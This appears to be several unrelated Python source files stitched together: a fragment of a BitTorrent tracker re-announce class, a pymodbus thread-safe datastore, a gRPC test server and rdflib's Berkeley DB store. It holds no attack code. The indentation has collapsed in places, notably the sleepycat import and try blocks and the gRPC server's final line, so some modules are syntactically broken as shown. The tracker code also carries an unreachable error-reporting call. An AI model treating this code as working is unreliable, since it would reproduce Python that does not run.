        # Worker thread: walk the tracker tiers until one answers.
        try:
            def fail(self = self, callback = callback):
                self._fail(callback)
            if self.ip:
                try:
                    s += '&ip=' + gethostbyname(self.ip)
                except:
                    self.errorcodes['troublecode'] = 'unable to resolve: '+self.ip
                    self.externalsched(fail)
            self.errorcodes = {}
            if self.special is None:
                for t in range(len(self.trackerlist)):
                    for tr in range(len(self.trackerlist[t])):
                        tracker = self.trackerlist[t][tr]
                        if self.rerequest_single(tracker, s, callback):
                            if not self.last_failed and tr != 0:
                                # Promote the responding tracker to the head
                                # of its tier (multitracker convention).
                                del self.trackerlist[t][tr]
                                self.trackerlist[t] = [tracker] + self.trackerlist[t]
                            return
            else:
                tracker = self.special
                self.special = None
                if self.rerequest_single(tracker, s, callback):
                    return
            # no success from any tracker
            self.externalsched(fail)
        except:
            self.exception(callback)

    def _fail(self, callback):
        if ( (self.upratefunc() < 100 and self.downratefunc() < 100)
            or not self.amount_left() ):
            for f in ['rejected', 'bad_data', 'troublecode']:
                if self.errorcodes.has_key(f):
                    r = self.errorcodes[f]
                    break
            else:
                r = 'Problem connecting to tracker - unspecified error'
            return
            # NOTE(review): the `return` above makes the errorfunc call
            # unreachable -- looks like error reporting was deliberately
            # disabled in this fork, but it also skips the bookkeeping
            # below (last_failed / lock.give_up); confirm intent.
            self.errorfunc(r)
        self.last_failed = True
        self.lock.give_up()
        self.externalsched(callback)

    def rerequest_single(self, t, s, callback):
        # Fire one tracker request on its own thread and block (via the
        # SuccessLock) until it succeeds, fails, or times out.
        l = self.lock.set()
        rq = Thread(target = self._rerequest_single, args = [t, s+get_key(t), l, callback])
        rq.setDaemon(False)
        rq.start()
        self.lock.wait()
        if self.lock.success:
            self.lastsuccessful = t
            self.last_failed = False
            self.never_succeeded = False
            return True
        if not self.last_failed and self.lastsuccessful == t:
            # if the last tracker hit was successful, and you've just tried the tracker
            # you'd contacted before, don't go any further, just fail silently.
            self.last_failed = True
            self.externalsched(callback)
            self.lock.give_up()
            return True
        return False  # returns true if it wants rerequest() to exit

    def _rerequest_single(self, t, s, l, callback):
        try:
            closer = [None]

            def timedout(self = self, l = l, closer = closer):
                # Runs on the scheduler thread after self.timeout seconds;
                # only the first tripper records an error and unblocks.
                if self.lock.trip(l):
                    self.errorcodes['troublecode'] = 'Problem connecting to tracker - timeout exceeded'
                    self.lock.unwait(l)
                try:
                    closer[0]()
                except:
                    pass

            self.externalsched(timedout, self.timeout)
            err = None
            try:
                h = urlopen(t+s)
                closer[0] = h.close
                data = h.read()
            except (IOError, error), e:
                err = 'Problem connecting to tracker - ' + str(e)
            except:
                err = 'Problem connecting to tracker'
            try:
                h.close()
            except:
                pass
            if err:
                if self.lock.trip(l):
                    self.errorcodes['troublecode'] = err
                    self.lock.unwait(l)
                return
            if data == '':
                if self.lock.trip(l):
                    self.errorcodes['troublecode'] = 'no data from tracker'
                    self.lock.unwait(l)
                return
            try:
                r = bdecode(data, sloppy=1)
                check_peers(r)
            except ValueError, e:
                if self.lock.trip(l):
                    self.errorcodes['bad_data'] = 'bad data from tracker - ' + str(e)
                    self.lock.unwait(l)
                return
            if r.has_key('failure reason'):
                if self.lock.trip(l):
                    self.errorcodes['rejected'] = self.rejectedmessage + r['failure reason']
                    self.lock.unwait(l)
                return
            if self.lock.trip(l, True):  # success!
                self.lock.unwait(l)
            else:
                callback = lambda: None  # attempt timed out, don't do a callback
            # even if the attempt timed out, go ahead and process data
            def add(self = self, r = r, callback = callback):
                self.postrequest(r, callback)
            self.externalsched(add)
        except:
            self.exception(callback)

    def postrequest(self, r, callback):
        # Runs on the scheduler thread: digest the tracker response and
        # hand any new peers to the connecter.
        if r.has_key('warning message'):
            self.errorfunc('warning from tracker - ' + r['warning message'])
        self.announce_interval = r.get('interval', self.announce_interval)
        self.interval = r.get('min interval', self.interval)
        self.trackerid = r.get('tracker id', self.trackerid)
        self.last = r.get('last')
        # ps = len(r['peers']) + self.howmany()
        p = r['peers']
        peers = []
        if type(p) == type(''):
            # compact=1 response: 6 bytes per peer (4 IP + 2 port, big-endian)
            for x in xrange(0, len(p), 6):
                ip = '.'.join([str(ord(i)) for i in p[x:x+4]])
                port = (ord(p[x+4]) << 8) | ord(p[x+5])
                peers.append(((ip, port), 0))
        else:
            # Non-compact: a list of dicts per peer.
            for x in p:
                peers.append(((x['ip'].strip(), x['port']), x.get('peer id',0)))
        ps = len(peers) + self.howmany()
        if ps < self.maxpeers:
            # Still short of peers: clear 'last' so the next announce asks
            # for a fresh full peer list.
            if self.doneflag.isSet():
                if r.get('num peers', 1000) - r.get('done peers', 0) > ps * 1.2:
                    self.last = None
            else:
                if r.get('num peers', 1000) > ps * 1.2:
                    self.last = None
        if self.seededfunc and r.get('seeded'):
            self.seededfunc()
        elif peers:
            shuffle(peers)
            self.connect(peers)
        callback()

    def exception(self, callback):
        # Capture the traceback on this worker thread and report it from
        # the scheduler thread.
        data = StringIO()
        print_exc(file = data)
        def r(s = data.getvalue(), callback = callback):
            if self.excfunc:
                self.excfunc(s)
            else:
                print s
            callback()
        self.externalsched(r)
class SuccessLock:
    """Arbitrates between a tracker-request thread and its timeout.

    Each attempt gets a unique code from set(); whichever of the worker
    or the timeout trips first (with that code) wins and releases the
    waiter via unwait().
    """

    def __init__(self):
        self.lock = Lock()    # guards the fields below
        self.pause = Lock()   # held while an attempt is outstanding
        self.code = 0L        # id of the current attempt
        self.success = False
        self.finished = True

    def reset(self):
        # Begin a new announce cycle.
        self.success = False
        self.finished = False

    def set(self):
        # Begin a new attempt; returns the code identifying it.
        self.lock.acquire()
        if not self.pause.locked():
            self.pause.acquire()
        self.first = True
        self.code += 1L
        self.lock.release()
        return self.code

    def trip(self, code, s = False):
        # First caller with the current code wins (returns True once);
        # s=True marks the whole cycle as successfully finished.
        self.lock.acquire()
        try:
            if code == self.code and not self.finished:
                r = self.first
                self.first = False
                if s:
                    self.finished = True
                    self.success = True
                return r
        finally:
            self.lock.release()

    def give_up(self):
        self.lock.acquire()
        self.success = False
        self.finished = True
        self.lock.release()

    def wait(self):
        # Block until the current attempt's winner calls unwait().
        self.pause.acquire()

    def unwait(self, code):
        if code == self.code and self.pause.locked():
            self.pause.release()

    def isfinished(self):
        self.lock.acquire()
        x = self.finished
        self.lock.release()
        return x
|
thread_safe_datastore.py | import threading
from contextlib import contextmanager
from pymodbus.datastore.store import BaseModbusDataBlock
class ContextWrapper(object):
    """ This is a simple wrapper around enter
    and exit functions that conforms to the python
    context manager protocol:

        with ContextWrapper(enter, leave):
            do_something()
    """

    def __init__(self, enter=None, leave=None, factory=None):
        """ Initialize a new context wrapper

        :param enter: Optional callable invoked on entering the context
        :param leave: Optional callable invoked on leaving the context
        :param factory: Optional callable whose result __enter__ returns
            instead of this wrapper
        """
        self._enter = enter
        self._leave = leave
        self._factory = factory

    def __enter__(self):
        # BUG FIX: this previously read `self.enter`, an attribute that is
        # never set, so any wrapper with an enter callback raised
        # AttributeError on entry.
        if self._enter: self._enter()
        return self if not self._factory else self._factory()

    def __exit__(self, *args):
        if self._leave: self._leave()
class ReadWriteLock(object):
    """ This reader writer lock guarantees write order, but not
    read order and is generally biased towards allowing writes
    if they are available to prevent starvation.

    TODO:

    * allow user to choose between read/write/random biasing
      - currently write biased
      - read biased allow N readers in queue
      - random is 50/50 choice of next
    """

    def __init__(self):
        """ Initializes a new instance of the ReadWriteLock
        """
        self.queue = []                                       # the current writer queue
        self.lock = threading.Lock()                          # the underlying condition lock
        self.read_condition = threading.Condition(self.lock)  # the single reader condition
        self.readers = 0                                      # the number of current readers
        self.writer = False                                   # is there a current writer

    def __is_pending_writer(self):
        # True when a writer holds the lock, or a writer is queued ahead
        # of the shared reader condition.
        return (self.writer                                   # if there is a current writer
            or (self.queue                                    # or if there is a waiting writer
            and (self.queue[0] != self.read_condition)))      # or if the queue head is not a reader

    def acquire_reader(self):
        """ Notifies the lock that a new reader is requesting
        the underlying resource.
        """
        with self.lock:
            if self.__is_pending_writer():                    # if there are existing writers waiting
                if self.read_condition not in self.queue:     # do not pollute the queue with readers
                    self.queue.append(self.read_condition)    # add the readers in line for the queue
                while self.__is_pending_writer():             # until the current writer is finished
                    self.read_condition.wait(1)               # wait on our condition
                if self.queue and self.read_condition == self.queue[0]:  # if the read condition is at the queue head
                    self.queue.pop(0)                         # then go ahead and remove it
            self.readers += 1                                 # update the current number of readers

    def acquire_writer(self):
        """ Notifies the lock that a new writer is requesting
        the underlying resource.
        """
        with self.lock:
            if self.writer or self.readers:                   # if we need to wait on a writer or readers
                condition = threading.Condition(self.lock)    # create a condition just for this writer
                self.queue.append(condition)                  # and put it on the waiting queue
                while self.writer or self.readers:            # until the write lock is free
                    condition.wait(1)                         # wait on our condition
                self.queue.pop(0)                             # remove our condition after our condition is met
            self.writer = True                                # stop other writers from operating

    def release_reader(self):
        """ Notifies the lock that an existing reader is
        finished with the underlying resource.
        """
        with self.lock:
            self.readers = max(0, self.readers - 1)           # readers should never go below 0
            if not self.readers and self.queue:               # if there are no active readers
                self.queue[0].notify_all()                    # then notify any waiting writers

    def release_writer(self):
        """ Notifies the lock that an existing writer is
        finished with the underlying resource.
        """
        with self.lock:
            self.writer = False                               # give up current writing handle
            if self.queue:                                    # if someone is waiting in the queue
                self.queue[0].notify_all()                    # wake them up first
            else: self.read_condition.notify_all()            # otherwise wake up all possible readers

    @contextmanager
    def get_reader_lock(self):
        """ Wrap some code with a reader lock using the
        python context manager protocol::

            with rwlock.get_reader_lock():
                do_read_operation()
        """
        try:
            self.acquire_reader()
            yield self
        finally: self.release_reader()

    @contextmanager
    def get_writer_lock(self):
        """ Wrap some code with a writer lock using the
        python context manager protocol::

            with rwlock.get_writer_lock():
                do_read_operation()
        """
        try:
            self.acquire_writer()
            yield self
        finally: self.release_writer()
class ThreadSafeDataBlock(BaseModbusDataBlock):
    """A decorator that serializes access to an existing data block.

    Wrap any data block with this class to make it safe to operate on
    from multiple concurrent threads.  The reader/writer lock sits on the
    block rather than on the manager because that is the lesser source of
    contention (writes to slave 0x01 can proceed while slave 0x02 is read).
    """

    def __init__(self, block):
        """Create the thread safe decorator.

        :param block: The block to decorate
        """
        self.block = block
        self.rwlock = ReadWriteLock()

    def validate(self, address, count=1):
        """Check whether a request lies within range.

        :param address: The starting address
        :param count: The number of values to test for
        :returns: True if the request is within range, False otherwise
        """
        with self.rwlock.get_reader_lock():
            return self.block.validate(address, count)

    def getValues(self, address, count=1):
        """Read values from the wrapped datastore under the read lock.

        :param address: The starting address
        :param count: The number of values to retrieve
        :returns: The requested values from a:a+c
        """
        with self.rwlock.get_reader_lock():
            return self.block.getValues(address, count)

    def setValues(self, address, values):
        """Write values to the wrapped datastore under the write lock.

        :param address: The starting address
        :param values: The new values to be set
        """
        with self.rwlock.get_writer_lock():
            return self.block.setValues(address, values)
if __name__ == "__main__":

    class AtomicCounter(object):
        # Simple thread-safe counter used to drive the smoke test below.
        def __init__(self, **kwargs):
            self.counter = kwargs.get('start', 0)
            self.finish = kwargs.get('finish', 1000)
            self.lock = threading.Lock()

        def increment(self, count=1):
            with self.lock:
                self.counter += count

        def is_running(self):
            return self.counter <= self.finish

    locker = ReadWriteLock()
    readers, writers = AtomicCounter(), AtomicCounter()

    def read():
        # Hammer the reader side until either counter hits its limit.
        while writers.is_running() and readers.is_running():
            with locker.get_reader_lock():
                readers.increment()

    def write():
        # Hammer the writer side until either counter hits its limit.
        while writers.is_running() and readers.is_running():
            with locker.get_writer_lock():
                writers.increment()

    # Many readers versus a couple of writers to exercise the bias logic.
    rthreads = [threading.Thread(target=read) for i in range(50)]
    wthreads = [threading.Thread(target=write) for i in range(2)]
    for t in rthreads + wthreads: t.start()
    for t in rthreads + wthreads: t.join()
    print("readers[%d] writers[%d]" % (readers.counter, writers.counter))
|
grpcserver.py | import os
import sys
import grpc
import json
import base64
import threading
import importlib
from concurrent import futures
from google.protobuf import json_format
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "..", "art"))
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "..", "art", "sanity"))
pb2_grpc = importlib.import_module("sanity_pb2_grpc")
pb2 = importlib.import_module("sanity_pb2")
GRPC_PORT = 50051
class OpenapiServicer(pb2_grpc.OpenapiServicer):
    """gRPC servicer for the sanity Openapi service.

    Stores the last accepted prefix_config and echoes it back on demand.
    """

    def __init__(self):
        # Last config accepted by SetConfig, kept as a plain dict.
        self._prefix_config = None
        super(OpenapiServicer, self).__init__()

    def _log(self, value):
        print("gRPC Server: %s" %value)

    def SetConfig(self, request, context):
        self._log("Executing SetConfig")
        # Canned JSON bodies for the two possible response statuses.
        response_400 = """
        {
            "status_code_400" : {
                "errors" : ["invalid value"]
            }
        }
        """
        response_200 = """
        {
            "status_code_200" : "%s"
        }
        """ % base64.b64encode(
            b"success"
        ).decode(
            "utf-8"
        )
        test = request.prefix_config.l.integer
        # Remember the config regardless of whether validation passes.
        self._prefix_config = json_format.MessageToDict(
            request.prefix_config, preserving_proto_field_name=True
        )
        # The sample integer field is only valid in the range [10, 90].
        if test is not None and (test < 10 or test > 90):
            res_obj = json_format.Parse(response_400, pb2.SetConfigResponse())
        else:
            res_obj = json_format.Parse(response_200, pb2.SetConfigResponse())
        return res_obj

    def GetConfig(self, request, context):
        self._log("Executing GetConfig")
        # Echo back whatever SetConfig stored last.
        response_200 = {
            "status_code_200": self._prefix_config
        }
        res_obj = json_format.Parse(
            json.dumps(response_200), pb2.GetConfigResponse()
        )
        return res_obj
def gRpcServer():
    """Build the sanity gRPC server, bind it to GRPC_PORT and block until
    termination (Ctrl-C triggers a 5-second graceful stop)."""
    rpc_server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
    pb2_grpc.add_OpenapiServicer_to_server(OpenapiServicer(), rpc_server)
    print("gRPC Server: Starting server. Listening on port %s." % GRPC_PORT)
    rpc_server.add_insecure_port("[::]:{}".format(GRPC_PORT))
    rpc_server.start()
    try:
        rpc_server.wait_for_termination()
    except KeyboardInterrupt:
        rpc_server.stop(5)
        print("Server shutdown gracefully")
def grpc_server():
    """Run gRpcServer() on a background daemon thread (non-blocking)."""
    web_server_thread = threading.Thread(target=gRpcServer)
    # Thread.setDaemon() is deprecated since Python 3.10; assign the
    # attribute instead (same effect: don't block interpreter exit).
    web_server_thread.daemon = True
    web_server_thread.start()
if __name__ == '__main__':
gRpcServer() |
sleepycat.py | from rdflib.store import Store, VALID_STORE, NO_STORE
from rdflib.term import URIRef
from rdflib.py3compat import b
def bb(u):
    """UTF-8-encode the text string *u* into bytes (bsddb keys/values)."""
    encoded = u.encode('utf-8')
    return encoded
try:
from bsddb import db
has_bsddb = True
except ImportError:
try:
from bsddb3 import db
has_bsddb = True
except ImportError:
has_bsddb = False
from os import mkdir
from os.path import exists, abspath
from urllib import pathname2url
from threading import Thread
if has_bsddb:
# These are passed to bsddb when creating DBs
# passed to db.DBEnv.set_flags
ENVSETFLAGS = db.DB_CDB_ALLDB
# passed to db.DBEnv.open
ENVFLAGS = db.DB_INIT_MPOOL | db.DB_INIT_CDB | db.DB_THREAD
CACHESIZE = 1024 * 1024 * 50
# passed to db.DB.Open()
DBOPENFLAGS = db.DB_THREAD
import logging
logger = logging.getLogger(__name__)
__all__ = ['Sleepycat']
class Sleepycat(Store):
    """An rdflib Store backed by Berkeley DB (bsddb/bsddb3).

    Keeps one B-tree index per triple permutation (cspo, cpos, cosp) plus
    side tables for contexts, namespace prefix bindings and the
    term<->integer-id mappings (k2i / i2k).  A background thread batches
    db syncs.

    NOTE(review): this module is Python 2 only -- it uses tuple parameter
    unpacking (removed by PEP 3113), ``xrange``, the ``0660`` octal literal
    and ``except Exception, e`` syntax.
    """
    # Store capability flags consumed by rdflib.
    context_aware = True
    formula_aware = True
    transaction_aware = False
    graph_aware = True
    db_env = None
    batch_unification = False
    def __init__(self, configuration=None, identifier=None):
        """Fail fast when no bsddb binding is importable; defer all DB work
        to open()."""
        if not has_bsddb:
            raise ImportError(
                "Unable to import bsddb/bsddb3, store is unusable.")
        self.__open = False
        self.__identifier = identifier
        super(Sleepycat, self).__init__(configuration)
        # Shortcuts for (de)serializing rdflib terms.
        self._loads = self.node_pickler.loads
        self._dumps = self.node_pickler.dumps
    def __get_identifier(self):
        return self.__identifier
    identifier = property(__get_identifier)
    def _init_db_environment(self, homeDir, create=True):
        """Create/open the shared DB environment under homeDir.

        Returns NO_STORE when the directory is missing and create is False.
        """
        if not exists(homeDir):
            if create is True:
                mkdir(homeDir)
                # TODO: implement create method and refactor this to it
                self.create(homeDir)
            else:
                return NO_STORE
        db_env = db.DBEnv()
        db_env.set_cachesize(0, CACHESIZE)  # TODO
        # db_env.set_lg_max(1024*1024)
        db_env.set_flags(ENVSETFLAGS, 1)
        db_env.open(homeDir, ENVFLAGS | db.DB_CREATE)
        return db_env
    def is_open(self):
        return self.__open
    def open(self, path, create=True):
        """Open (optionally creating) the store at *path*.

        Builds the three permutation indices, the lookup-dispatch table for
        all 8 (s?,p?,o?) query patterns, the side tables, and starts the
        background sync thread.  Returns VALID_STORE or NO_STORE.
        """
        if not has_bsddb:
            return NO_STORE
        homeDir = path
        if self.__identifier is None:
            # Default identifier: file-URL of the store directory.
            self.__identifier = URIRef(pathname2url(abspath(homeDir)))
        db_env = self._init_db_environment(homeDir, create)
        if db_env == NO_STORE:
            return NO_STORE
        self.db_env = db_env
        self.__open = True
        dbname = None
        dbtype = db.DB_BTREE
        # auto-commit ensures that the open-call commits when transactions
        # are enabled
        dbopenflags = DBOPENFLAGS
        if self.transaction_aware is True:
            dbopenflags |= db.DB_AUTO_COMMIT
        if create:
            dbopenflags |= db.DB_CREATE
        dbmode = 0660
        dbsetflags = 0
        # create and open the DBs -- one index per rotation of (s, p, o).
        self.__indicies = [None, ] * 3
        self.__indicies_info = [None, ] * 3
        for i in xrange(0, 3):
            # Index file names are e.g. "c^s^p^o^" / "c^p^o^s^" / "c^o^s^p^".
            index_name = to_key_func(
                i)((b("s"), b("p"), b("o")), b("c")).decode()
            index = db.DB(db_env)
            index.set_flags(dbsetflags)
            index.open(index_name, dbname, dbtype, dbopenflags, dbmode)
            self.__indicies[i] = index
            self.__indicies_info[i] = (index, to_key_func(i), from_key_func(i))
        # For each of the 8 bound/unbound query patterns pick the index
        # rotation giving the longest contiguous bound prefix.
        lookup = {}
        for i in xrange(0, 8):
            results = []
            for start in xrange(0, 3):
                score = 1
                len = 0  # NOTE(review): shadows the builtin ``len`` locally
                for j in xrange(start, start + 3):
                    if i & (1 << (j % 3)):
                        score = score << 1
                        len += 1
                    else:
                        break
                tie_break = 2 - start
                results.append(((score, tie_break), start, len))
            results.sort()
            score, start, len = results[-1]
            def get_prefix_func(start, end):
                # Closure factory so each pattern captures its own bounds.
                def get_prefix(triple, context):
                    if context is None:
                        yield ""
                    else:
                        yield context
                    i = start
                    while i < end:
                        yield triple[i % 3]
                        i += 1
                    yield ""
                return get_prefix
            lookup[i] = (
                self.__indicies[start],
                get_prefix_func(start, start + len),
                from_key_func(start),
                results_from_key_func(start, self._from_string))
        self.__lookup_dict = lookup
        # Side tables: known contexts, namespace<->prefix maps, and the
        # term<->integer id maps (k2i is a hash, i2k an append-only recno).
        self.__contexts = db.DB(db_env)
        self.__contexts.set_flags(dbsetflags)
        self.__contexts.open("contexts", dbname, dbtype, dbopenflags, dbmode)
        self.__namespace = db.DB(db_env)
        self.__namespace.set_flags(dbsetflags)
        self.__namespace.open("namespace", dbname, dbtype, dbopenflags, dbmode)
        self.__prefix = db.DB(db_env)
        self.__prefix.set_flags(dbsetflags)
        self.__prefix.open("prefix", dbname, dbtype, dbopenflags, dbmode)
        self.__k2i = db.DB(db_env)
        self.__k2i.set_flags(dbsetflags)
        self.__k2i.open("k2i", dbname, db.DB_HASH, dbopenflags, dbmode)
        self.__i2k = db.DB(db_env)
        self.__i2k.set_flags(dbsetflags)
        self.__i2k.open("i2k", dbname, db.DB_RECNO, dbopenflags, dbmode)
        self.__needs_sync = False
        t = Thread(target=self.__sync_run)
        t.setDaemon(True)
        t.start()
        self.__sync_thread = t
        return VALID_STORE
    def __sync_run(self):
        """Background thread: debounce sync() calls.

        Waits at least min_seconds after the last write (and at most
        max_seconds after the first pending write) before syncing.
        """
        from time import sleep, time
        try:
            min_seconds, max_seconds = 10, 300
            while self.__open:
                if self.__needs_sync:
                    t0 = t1 = time()
                    self.__needs_sync = False
                    while self.__open:
                        sleep(.1)
                        if self.__needs_sync:
                            # New write arrived: restart the quiet period.
                            t1 = time()
                            self.__needs_sync = False
                        if time() - t1 > min_seconds \
                                or time() - t0 > max_seconds:
                            self.__needs_sync = False
                            logger.debug("sync")
                            self.sync()
                            break
                else:
                    sleep(1)
        except Exception, e:
            logger.exception(e)
    def sync(self):
        """Flush every open DB to disk."""
        if self.__open:
            for i in self.__indicies:
                i.sync()
            self.__contexts.sync()
            self.__namespace.sync()
            self.__prefix.sync()
            self.__i2k.sync()
            self.__k2i.sync()
    def close(self, commit_pending_transaction=False):
        """Stop the sync thread and close all DBs and the environment."""
        self.__open = False
        self.__sync_thread.join()
        for i in self.__indicies:
            i.close()
        self.__contexts.close()
        self.__namespace.close()
        self.__prefix.close()
        self.__i2k.close()
        self.__k2i.close()
        self.db_env.close()
    def add(self, triple, context, quoted=False, txn=None):
        """Add a triple to the store, updating all three permutation indices
        and (unless quoted) the conjunctive ""-context entries, which carry
        the "^"-joined set of contexts containing the triple."""
        (subject, predicate, object) = triple
        assert self.__open, "The Store must be open."
        assert context != self, "Can not add triple directly to store"
        Store.add(self, (subject, predicate, object), context, quoted)
        _to_string = self._to_string
        s = _to_string(subject, txn=txn)
        p = _to_string(predicate, txn=txn)
        o = _to_string(object, txn=txn)
        c = _to_string(context, txn=txn)
        cspo, cpos, cosp = self.__indicies
        value = cspo.get(bb("%s^%s^%s^%s^" % (c, s, p, o)), txn=txn)
        if value is None:
            self.__contexts.put(bb(c), "", txn=txn)
            contexts_value = cspo.get(
                bb("%s^%s^%s^%s^" % ("", s, p, o)), txn=txn) or b("")
            contexts = set(contexts_value.split(b("^")))
            contexts.add(bb(c))
            contexts_value = b("^").join(contexts)
            assert contexts_value is not None
            cspo.put(bb("%s^%s^%s^%s^" % (c, s, p, o)), "", txn=txn)
            cpos.put(bb("%s^%s^%s^%s^" % (c, p, o, s)), "", txn=txn)
            cosp.put(bb("%s^%s^%s^%s^" % (c, o, s, p)), "", txn=txn)
            if not quoted:
                cspo.put(bb(
                    "%s^%s^%s^%s^" % ("", s, p, o)), contexts_value, txn=txn)
                cpos.put(bb(
                    "%s^%s^%s^%s^" % ("", p, o, s)), contexts_value, txn=txn)
                cosp.put(bb(
                    "%s^%s^%s^%s^" % ("", o, s, p)), contexts_value, txn=txn)
            self.__needs_sync = True
    def __remove(self, (s, p, o), c, quoted=False, txn=None):
        """Delete one fully-bound triple from context *c* in every index and
        rewrite (or drop) its conjunctive ""-context entries."""
        cspo, cpos, cosp = self.__indicies
        contexts_value = cspo.get(
            b("^").join([b(""), s, p, o, b("")]), txn=txn) or b("")
        contexts = set(contexts_value.split(b("^")))
        contexts.discard(c)
        contexts_value = b("^").join(contexts)
        for i, _to_key, _from_key in self.__indicies_info:
            i.delete(_to_key((s, p, o), c), txn=txn)
        if not quoted:
            if contexts_value:
                for i, _to_key, _from_key in self.__indicies_info:
                    i.put(_to_key((s, p, o), b("")), contexts_value, txn=txn)
            else:
                # Last context gone: drop the conjunctive entries too.
                for i, _to_key, _from_key in self.__indicies_info:
                    try:
                        i.delete(_to_key((s, p, o), b("")), txn=txn)
                    except db.DBNotFoundError:
                        pass  # TODO: is it okay to ignore these?
    def remove(self, (subject, predicate, object), context, txn=None):
        """Remove all triples matching the (possibly wildcard) pattern,
        optionally restricted to *context*."""
        assert self.__open, "The Store must be open."
        Store.remove(self, (subject, predicate, object), context)
        _to_string = self._to_string
        if context is not None:
            if context == self:
                context = None
        if subject is not None \
                and predicate is not None \
                and object is not None \
                and context is not None:
            # Fast path: fully bound pattern -> single keyed delete.
            s = _to_string(subject, txn=txn)
            p = _to_string(predicate, txn=txn)
            o = _to_string(object, txn=txn)
            c = _to_string(context, txn=txn)
            value = self.__indicies[0].get(bb("%s^%s^%s^%s^" %
                                              (c, s, p, o)), txn=txn)
            if value is not None:
                self.__remove((bb(s), bb(p), bb(o)), bb(c), txn=txn)
                self.__needs_sync = True
        else:
            # General path: cursor-scan the best index for the pattern.
            cspo, cpos, cosp = self.__indicies
            index, prefix, from_key, results_from_key = self.__lookup(
                (subject, predicate, object), context, txn=txn)
            cursor = index.cursor(txn=txn)
            try:
                current = cursor.set_range(prefix)
                needs_sync = True
            except db.DBNotFoundError:
                current = None
                needs_sync = False
            cursor.close()
            while current:
                key, value = current
                # Re-open a cursor per step so deletes don't invalidate it.
                cursor = index.cursor(txn=txn)
                try:
                    cursor.set_range(key)
                    # Hack to stop 2to3 converting this to next(cursor)
                    current = getattr(cursor, 'next')()
                except db.DBNotFoundError:
                    current = None
                cursor.close()
                if key.startswith(prefix):
                    c, s, p, o = from_key(key)
                    if context is None:
                        contexts_value = index.get(key, txn=txn) or b("")
                        # remove triple from all non quoted contexts
                        contexts = set(contexts_value.split(b("^")))
                        # and from the conjunctive index
                        contexts.add(b(""))
                        for c in contexts:
                            for i, _to_key, _ in self.__indicies_info:
                                i.delete(_to_key((s, p, o), c), txn=txn)
                    else:
                        self.__remove((s, p, o), c, txn=txn)
                else:
                    break
            if context is not None:
                if subject is None and predicate is None and object is None:
                    # TODO: also if context becomes empty and not just on
                    # remove((None, None, None), c)
                    try:
                        self.__contexts.delete(
                            bb(_to_string(context, txn=txn)), txn=txn)
                    except db.DBNotFoundError:
                        pass
            self.__needs_sync = needs_sync
    def triples(self, (subject, predicate, object), context=None, txn=None):
        """A generator over all the triples matching the pattern; yields
        ((s, p, o), contexts-generator) tuples."""
        assert self.__open, "The Store must be open."
        if context is not None:
            if context == self:
                context = None
        # _from_string = self._from_string ## UNUSED
        index, prefix, from_key, results_from_key = self.__lookup(
            (subject, predicate, object), context, txn=txn)
        cursor = index.cursor(txn=txn)
        try:
            current = cursor.set_range(prefix)
        except db.DBNotFoundError:
            current = None
        cursor.close()
        while current:
            key, value = current
            cursor = index.cursor(txn=txn)
            try:
                cursor.set_range(key)
                # Cheap hack so 2to3 doesn't convert to next(cursor)
                current = getattr(cursor, 'next')()
            except db.DBNotFoundError:
                current = None
            cursor.close()
            if key and key.startswith(prefix):
                contexts_value = index.get(key, txn=txn)
                yield results_from_key(
                    key, subject, predicate, object, contexts_value)
            else:
                break
    def __len__(self, context=None):
        """Count triples, in one context or (context=None) conjunctively."""
        assert self.__open, "The Store must be open."
        if context is not None:
            if context == self:
                context = None
        if context is None:
            prefix = b("^")
        else:
            prefix = bb("%s^" % self._to_string(context))
        index = self.__indicies[0]
        cursor = index.cursor()
        current = cursor.set_range(prefix)
        count = 0
        while current:
            key, value = current
            if key.startswith(prefix):
                count += 1
                # Hack to stop 2to3 converting this to next(cursor)
                current = getattr(cursor, 'next')()
            else:
                break
        cursor.close()
        return count
    def bind(self, prefix, namespace):
        """Bind *prefix* to *namespace*, replacing any previous binding of
        the same namespace."""
        prefix = prefix.encode("utf-8")
        namespace = namespace.encode("utf-8")
        bound_prefix = self.__prefix.get(namespace)
        if bound_prefix:
            self.__namespace.delete(bound_prefix)
        self.__prefix[namespace] = prefix
        self.__namespace[prefix] = namespace
    def namespace(self, prefix):
        """Return the URIRef bound to *prefix*, or None."""
        prefix = prefix.encode("utf-8")
        ns = self.__namespace.get(prefix, None)
        if ns is not None:
            return URIRef(ns.decode('utf-8'))
        return None
    def prefix(self, namespace):
        """Return the prefix bound to *namespace*, or None."""
        namespace = namespace.encode("utf-8")
        prefix = self.__prefix.get(namespace, None)
        if prefix is not None:
            return prefix.decode('utf-8')
        return None
    def namespaces(self):
        """Yield every (prefix, namespace-URIRef) binding."""
        cursor = self.__namespace.cursor()
        results = []
        current = cursor.first()
        while current:
            prefix, namespace = current
            results.append((prefix.decode('utf-8'), namespace.decode('utf-8')))
            # Hack to stop 2to3 converting this to next(cursor)
            current = getattr(cursor, 'next')()
        cursor.close()
        for prefix, namespace in results:
            yield prefix, URIRef(namespace)
    def contexts(self, triple=None):
        """Yield the contexts containing *triple*, or all known contexts
        when no triple is given."""
        _from_string = self._from_string
        _to_string = self._to_string
        if triple:
            s, p, o = triple
            s = _to_string(s)
            p = _to_string(p)
            o = _to_string(o)
            # The conjunctive ""-context entry stores the "^"-joined
            # context ids for this triple.
            contexts = self.__indicies[0].get(bb(
                "%s^%s^%s^%s^" % ("", s, p, o)))
            if contexts:
                for c in contexts.split(b("^")):
                    if c:
                        yield _from_string(c)
        else:
            index = self.__contexts
            cursor = index.cursor()
            current = cursor.first()
            cursor.close()
            while current:
                key, value = current
                context = _from_string(key)
                yield context
                cursor = index.cursor()
                try:
                    cursor.set_range(key)
                    # Hack to stop 2to3 converting this to next(cursor)
                    current = getattr(cursor, 'next')()
                except db.DBNotFoundError:
                    current = None
                cursor.close()
    def add_graph(self, graph):
        self.__contexts.put(bb(self._to_string(graph)), "")
    def remove_graph(self, graph):
        self.remove((None, None, None), graph)
    def _from_string(self, i):
        """Look up integer id *i* in the i2k table and unpickle the term."""
        k = self.__i2k.get(int(i))
        return self._loads(k)
    def _to_string(self, term, txn=None):
        """Return the (string form of the) integer id for *term*, assigning
        a new id via the append-only i2k table on first sight."""
        k = self._dumps(term)
        i = self.__k2i.get(k, txn=txn)
        if i is None:
            # weird behavior from bsddb not taking a txn as a keyword
            # argument for append
            if self.transaction_aware:
                i = "%s" % self.__i2k.append(k, txn)
            else:
                i = "%s" % self.__i2k.append(k)
            self.__k2i.put(k, i, txn=txn)
        else:
            i = i.decode()
        return i
